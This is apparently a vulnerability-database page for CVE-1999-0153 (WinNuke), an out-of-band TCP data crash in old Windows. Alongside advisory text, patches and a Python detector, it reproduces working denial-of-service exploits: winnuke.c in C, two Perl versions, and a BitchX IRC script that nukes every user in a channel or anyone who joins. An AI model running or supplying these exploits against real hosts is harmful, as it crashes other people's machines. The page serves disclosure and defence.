CVE-1999-0153
CVSS 5.0
Published: 1997-07-01 00:00:00
Revised: 2008-09-09 08:33:52
NMCOE

[Original] Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke.


[CNNVD] Early Windows TCP/IP out-of-band (OOB) urgent data denial of service vulnerability (CNNVD-199707-008)

        
The TCP/IP protocol stack, implemented by most operating systems, is the most widely used networking protocol for Internet connectivity.
Some older Windows versions do not handle TCP urgent data correctly. A remote attacker can exploit this flaw to mount a denial-of-service attack against a server and crash the host.
On 7 May 1997 someone published winnuke.c. It first establishes a TCP connection to a Win95/NT host and then sends TCP urgent data, which crashes the system. 139/TCP is the port most commonly found listening on Win95/NT systems, so winnuke.c uses that port. The attack is called an "OOB attack" because of the MSG_OOB socket flag; strictly speaking it is a TCP urgent data attack.
<*Links: http://xforce.iss.net/static/173.php
 http://www.ciac.org/ciac/bulletins/h-57.shtml
*>

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:sco:openserver:5.0      SCO OpenServer 5.0
cpe:/o:microsoft:windows_95    Microsoft Windows 95
cpe:/o:microsoft:windows_nt    Microsoft Windows NT

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0153
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0153
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-008
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/1666
(UNKNOWN)  OSVDB  1666

- Vulnerability information

Early Windows TCP/IP out-of-band (OOB) urgent data denial of service vulnerability
Medium severity  Unknown
1997-07-01 00:00:00 2005-05-02 00:00:00
Remote

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Block external access to TCP/139 and TCP/445
        If you do not need to offer Windows file sharing or similar services externally, block inbound access to TCP/139 and TCP/445 at the firewall.
        Vendor patches:
        Microsoft
        ---------
        Microsoft has released patches for this issue:
        Patch download:
        Microsoft Windows 95

        http://support.microsoft.com/default.aspx?scid=
        http://download.microsoft.com/download/win95upg/patch1/1/w95/EN-US/vtcpupd.exe

        Microsoft Windows NT
        Install service pack SP4 or later, or download the hotfix here:
        ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/teardrop2-fix/

- Vulnerability information (20437)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (1) (EDBID:20437)
windows dos
1997-07-05 Verified
0 _eci
N/A [download]
source: http://www.securityfocus.com/bid/2010/info

Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.

According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "

As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.

Windows port 139 (NetBIOS) is most susceptible to this attack, although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning.
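Microsoft's description above gives a defender a precise signature: a segment with the URG flag set whose urgent pointer lands at the end of the payload, so no normal data follows. The following detector, an added example rather than code from the advisory or the exploit authors, parses a raw TCP segment and flags that shape; it assumes the RFC 793 reading of the urgent pointer (offset of the first byte after the urgent data) and uses constructed sample segments, not captured traffic.

```python
import struct
from dataclasses import dataclass

TCP_URG, TCP_ACK, TCP_PSH = 0x20, 0x10, 0x08
NETBIOS_PORTS = {139, 445}          # the ports the advisory says to filter

@dataclass
class Segment:
    src_port: int
    dst_port: int
    urg: bool
    urg_ptr: int
    payload_len: int
    urgent_at_end: bool             # URG set and no in-band data after it

def parse_tcp(raw: bytes) -> Segment:
    """Parse a raw TCP segment (header + payload, no IP header)."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    src, dst, _seq, _ack, off_flags, _win, _csum, urg_ptr = struct.unpack(
        "!HHIIHHHH", raw[:20])
    data_offset = (off_flags >> 12) * 4
    if data_offset < 20 or data_offset > len(raw):
        raise ValueError("bad data offset")
    payload_len = len(raw) - data_offset
    urg = bool(off_flags & TCP_URG)
    # RFC 793 reading (assumption): urg_ptr is the offset of the first byte
    # after the urgent data, so urg_ptr >= payload_len means nothing follows.
    return Segment(src, dst, urg, urg_ptr, payload_len,
                   urg and urg_ptr >= payload_len)

def classify(raw: bytes) -> str:
    """'alert' for the trigger shape on a NetBIOS/SMB port, 'suspicious'
    for the same shape on any other port, 'ok' otherwise."""
    seg = parse_tcp(raw)
    if not seg.urgent_at_end:
        return "ok"
    return "alert" if seg.dst_port in NETBIOS_PORTS else "suspicious"

def build_segment(src, dst, flags, urg_ptr, payload: bytes) -> bytes:
    """Constructed sample segment (20-byte header, no options) for testing."""
    hdr = struct.pack("!HHIIHHHH", src, dst, 1, 1, (5 << 12) | flags,
                      8192, 0, urg_ptr)
    return hdr + payload

# Constructed samples: the trigger shape against 139, a plain NetBIOS session
# message, and telnet-style urgent data that does have in-band data after it.
SAMPLES = {
    "urgent-at-end to 139": build_segment(40000, 139, TCP_ACK | TCP_PSH | TCP_URG, 3, b"Bye"),
    "plain NetBIOS session": build_segment(40001, 139, TCP_ACK | TCP_PSH, 0, b"\x81\x00\x00\x44"),
    "telnet urgent w/ data": build_segment(40002, 23, TCP_ACK | TCP_PSH | TCP_URG, 1, b"\xff\xf4data"),
}
```

Run `classify()` over each entry in `SAMPLES` to see the three verdicts; on a real sensor the same function would be fed the TCP portion of each captured packet.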

/*
        It is possible to remotely cause denial of service to any windows
95/NT user.  It is done by sending OOB [Out Of Band] data to an
established connection you have with a windows user.  NetBIOS [139] seems
to be the most effective since this is a part of windows.  Apparently
windows doesn't know how to handle OOB, so it panics and crazy things
happen.  I have heard reports of everything from windows dropping carrier
to the entire screen turning white.  Windows also sometimes has trouble
handling anything on a network at all after an attack like this.  A
reboot fixes whatever damage this causes.  Code follows.


--- CUT HERE ---
*/
/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>
#include <strings.h>     /* bzero(), bcopy() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139  /* Attack port: 139 is what we want */

int s;
char *str = "Bye";  /* Makes no diff */


/* Resolve server (hostname or dotted quad) and connect sock to server:port.
   Returns 0 on success, negative on failure. */
int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         /* s_addr is unsigned, so compare with INADDR_NONE rather than < 0 */
         if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,sizeof(blah))==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("Connected to [%s:%d].\n",server,port);
        return(0);
}


int main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s <target>\n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     if (open_sock(s,argv[1],dport) < 0)
        exit(-1);

     printf("Sending crash... ");
       /* MSG_OOB makes the stack set the URG flag on this segment */
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
     return 0;
}

- Vulnerability information (20438)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (2) (EDBID:20438)
windows dos
1997-05-07 Verified
0 _eci
N/A [download]
source: http://www.securityfocus.com/bid/2010/info

perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"some.windoze.box:139")->send("bye",MSG_OOB)'
		

- Vulnerability information (20439)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (3) (EDBID:20439)
windows dos
1997-05-07 Verified
0 _eci
N/A [download]
source: http://www.securityfocus.com/bid/2010/info

#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

# Host from argv[0]; port from argv[1], defaulting to NetBIOS (139)
$h = $ARGV[0]; $p = $ARGV[1] || 139;
die "A hostname must be provided. Ex: www.microsoft.com\n" unless $h;

$in_addr = (gethostbyname($h))[4] or die "Cannot resolve $h\n";
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;

		

- Vulnerability information (20440)

Windows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (4) (EDBID:20440)
windows dos
1997-05-07 Verified
0 maddog and lerper
N/A [download]
source: http://www.securityfocus.com/bid/2010/info

# WinNuke BitchX IRC script/wnuke package v 1.5
# Created by maddog and lerper
# maddog@bitsmart.com, lerper@bitsmart.com

#      WinNuke IRCers with several options:
#      the nick you define
#      all of the ops in your current channel
#      anyone who joins a channel
#      everyone in the channel

# Creditz:
# goes out to _eci for winnuke
# #BitchX for their great support
# #ircII for pretending to be asleep whenever i asked for help
# #hack for the laughs (hey--they were talking about vibrators last night)
# Micro$oft for hosting the hacking channels on comic chat
# KL and his LPLC LAX
# shout outs to the L0pht and hey to memebers of  "CdC"

# notice: this package was created so more people could learn about winnuke
# and more winblows users could patch themeslves up.
# NOT so lame ircers could have their kicks

#Before using this script, compile the included winnuke.c
#cc -owinnuke winnuke.c should do the job!
#If you have a GNU compiler...replace the cc with gcc
#Then move the executable into your /usr/local/bin directory and
#chmod it with the access levels you wish.

assign wnuke_pgm wnuke
assign wn [wnuke w/ mass nuke features]
assign wi [winnuke commands]
eval echo $wn version 1.5 loading... [ by: maddog and the lerper ]
eval echo $wn type /whelp for commands

alias whelp {
  eval echo $wi /wnuke <nick> - sends a win nuke to someone
  eval echo $wi /mwnuke - sends a win nuke to everyone on a chan
  eval echo $wi /awnuke - when someone joins, it nukes them too, effective with mwnuke
  eval echo $wi /opwnuke - sends a win nuke to all ops
}

alias wnuke {
   if ([$0]) {
      ^on ^311 "*" {^assign ndomain $3}
      ^on ^319 "*" #
      ^whois $0
      wait
      EVAL ^exec winnuke $1 $ndomain >/dev/null &
      echo [wnuke] sent wnuke to $0 at $ndomain requested\.
      ^on 311 - "*"
      ^on 319 - "*"
      ^assign -ndomain
   }
   {
      echo
      echo Usage: /wnuke <nick>
   }
}
/on -join * {@joinvar=[$0]}
alias awnuke { /on -join * {/wnuke $0}}
alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }}
alias opwnuke { fe ($chops()) blah { /wnuke $blah }}
		

- Vulnerability information

1666
Multiple Vendor Out Of Band Data Handling Remote DoS (WinNuke)
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Microsoft Windows and SCO Open Server contain a flaw that may allow a remote denial of service. The issue is triggered when an out-of-band packet is sent to port 139, and will result in loss of availability for the platform.

- Timeline

1997-05-07 Unknown
1997-05-07 Unknown

- Solution

Microsoft and SCO have released a patch to address this vulnerability. Additionally, it is possible to mitigate this attack by implementing the following workaround: filter all traffic to TCP Port 139.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.